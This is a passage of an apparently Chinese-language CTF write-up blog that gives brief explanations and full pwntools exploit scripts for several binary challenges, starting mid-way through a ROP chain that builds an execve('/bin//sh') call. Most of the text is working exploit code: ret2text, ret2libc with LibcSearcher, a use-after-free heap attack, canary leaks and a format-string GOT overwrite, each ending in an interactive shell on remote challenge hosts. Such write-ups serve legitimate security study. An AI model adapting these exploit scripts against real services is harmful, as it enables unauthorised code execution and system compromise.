p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall
payload=b'a'*(0x20+0x8)+p
io.sendline(payload)
io.interactive()
[SDCTF 2022]Horoscope
利用这个atoi去是a1等于1这个s的话是需要使用0x38才能溢出,那么的话利用使一个b’a’*0x38等于b’1’+b’a’*0x38因为atoi只会转换数字为整数,所以我们可以利用这个点去得到让这个程序完整运行,然后就是一个简单的ret2text了
from pwn import *
context.log_level='debug'
#p=remote('node4.anna.nssctf.cn',28120)
p=process('./horoscope')
elf=ELF('horoscope')
#payload=b'1'+b'a'*(0x30+0x7)+p64(elf.sym['debug'])+p64(elf.sym['test'])
payload=b'1'+b'a'*(0x37)+p64(0x40095F)
p.sendlineafter(b'pe',payload)
p.interactive()
[BJDCTF 2020]babyrop2
这个题讲究的是ret2libc注意字符串溢出为7即可按照ret2libc打就行
from pwn import *
context.log_level='debug'
from LibcSearcher import *
p=remote('node4.anna.nssctf.cn',28241)
#p=process('./pwn')
elf=ELF('pwn')
p.sendlineafter('u!\n','%7$p')
p.recvuntil('0x')
a=int(p.recv(16),16)
log.info(hex(a))
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi=0x400993
main=elf.sym['main']
vuln=elf.sym['vuln']
ret=0x4005f9
payload=b'a'*(0x20-0x8)+p64(a)+p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
p.sendlineafter('ory!\n',payload)
base_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.info(hex(base_addr))
puts=LibcSearcher('puts',base_addr)
libc_base=base_addr-puts.dump('puts')
system=libc_base+puts.dump('system')
bin_sh=libc_base+puts.dump('str_bin_sh')
payload=b'a'*(0x20-0x8)+p64(a)+p64(0)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.recvuntil('ory!\n')
p.sendline(payload)
p.interactive()
[BJDCTF 2020]YDSneedGirlfriend
这个题又是一个堆的题要好好的利用uaf去得到shell
首先我们看到这个题目是有一个free来释放内存但是并没有给指针清零导致再次分配时在被占用,并且show函数可以来调用指针指到的函数将被调用
from pwn import *
sh = remote('node4.anna.nssctf.cn',28732)
context.log_level='debug'
def add(size,name):
sh.sendline(str(1))
sh.recvuntil('size is :')
sh.sendline(str(size))
sh.recvuntil('ame is :')
sh.sendline(name)
# sh.recvuntil("choice :")
def delete(index):
sh.sendlineafter(':','2')
sh.recvuntil('Index :')
sh.sendline(str(index))
# sh.recvuntil("choice :")
def show(idx):
sh.recvuntil('choice :')
sh.sendline('3')
sh.sendlineafter('Index :',str(idx))
sh.recvuntil("oice :")
add(0x10,'aaaaa')
add(0x20,'bbbbb')
delete(0)
delete(1)
payload =p64(0x400B9C)
add(0x10,payload)
show(0)
sh.interactive()
[GDOUCTF 2023]奇怪的ELF
一个离谱的架构题目,两个文件一个是x86_64(arm64)一个是arm64所以第二个因为环境原因无法运行,把linux2里面的flag转换为16进制然后在python进行一次异或运算即可得到flag2
flag=[
0xF2, 0xEE, 0xE3, 0xD9, 0xCA, 0xEF, 0xE8, 0xF3, 0xFE, 0xD9,
0xF1, 0xE9, 0xF4, 0xEA, 0xE2, 0xA7, 0xFB
]
for i in flag:
print(chr(i^0x86),end='')
[HDCTF 2023]Makewish
这个题目很有意思需要自己多次调试才能知道具体的解决办法综合了前面的很多知识点
from pwn import *
import ctypes #这里调用了一个伪随机数
context.log_level='debug' #日志
libc=ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(1) #srand
while 1:
p=process('./pwn')
#p=remote('node4.anna.nssctf.cn',28492)
payload=b'a'*(0x30-0x8)
p.sendline(payload)
p.recvuntil(payload)
canary=u64(p.recv(8))-0x0a
log.info(hex(canary))
rand=libc.rand()%1000+324
p.sendafter('key\n',p32(rand))
payload=p64(0x4007C7)+p64(canary)
p.sendlineafter('me',payload)
p.interactive()
利用puts得到canary。
[CISCN 2019华中]PWN1
常规ret2libc直接打
from pwn import *
from LibcSearcher import *
context(arch='amd64', os='linux', log_level='debug')
#io = process('./CISCN_PWN1')
#io = process('./pwn')
io=remote('node5.anna.nssctf.cn',28793)
elf = ELF('./pwn')
Padding = b'\x00' + b'A' * (0x50 + 0x08 - 0x01)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.sym['main']
rdi = 0x400C83
ret = 0x4006B9
io.recvuntil(b'choice!\n')
io.sendline(b'1')
io.recvuntil(b'encrypted\n')
Payload = Padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendline(Payload)
io.recvuntil(b'Ciphertext\n')
io.recvuntil(b'\n')
addr = u64(io.recvuntil(b'\x7f')[:6].ljust(8, b'\x00'))
log.info(hex(addr))
libc = LibcSearcher('puts', addr)
libc_addr = addr-libc.dump('puts')
system_addr = libc_addr+libc.dump('system')
sh_addr = libc_addr+libc.dump('str_bin_sh')
io.recvuntil(b'choice!\n')
io.sendline(b'1')
io.recvuntil(b'encrypted\n')
Payload_2 = Padding + p64(ret) + p64(rdi) + p64(sh_addr) + p64(system_addr)
io.sendline(Payload_2)
io.interactive()
[MoeCTF 2022]babyfmt
查看到这个题很简单的处理方法,里面有个printf(buf)可以直接判断为字符串溢出,没开FULL,基本思路就是格式化字符串劫持got表,找到偏移之后试了几种修改,改发可以说是多种多样了。接收backdoor没啥用,可以改got表直接用system的got表就行,如果开FULL RELRO的话可以覆盖ret地址,给的地址还有点用
from pwn import *
elf=ELF('./pwn')
#p=process('./pwn')
p=remote('node5.anna.nssctf.cn',28523)
print_got=elf.got['printf']
p.recvuntil("\n")
p.sendline("%10$s")
baskdoor=int(p.recv(9),16)
payload=fmtstr_payload(11,{print_got:baskdoor})
p.sendline(payload)
p.interactive()
ciscn_2019_ne_5
注意scanf里面也给了sh和system直接打
from pwn import *
elf=ELF('./ciscn_2019_ne_5')
p=remote("node4.buuoj.cn",25421)
#p=process("./ciscn_2019_ne_5")
context.log_level='debug'
p.recvuntil(b"password:")
p.sendline(b"administrator")
system=elf.sym['system']
def add(text):
p.recvuntil(b":")
p.sendline(b"1")
p.recvuntil(b"nfo:")
p.sendline(text)
def et():
p.recvuntil(b":")
p.sendline(b"4")
payload=b'a'*(0x48+4)+p32(system)+b'\x01\x01\x01\x01'+p32(0x80482ea)
add(payload)
et()
p.interactive()
606
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
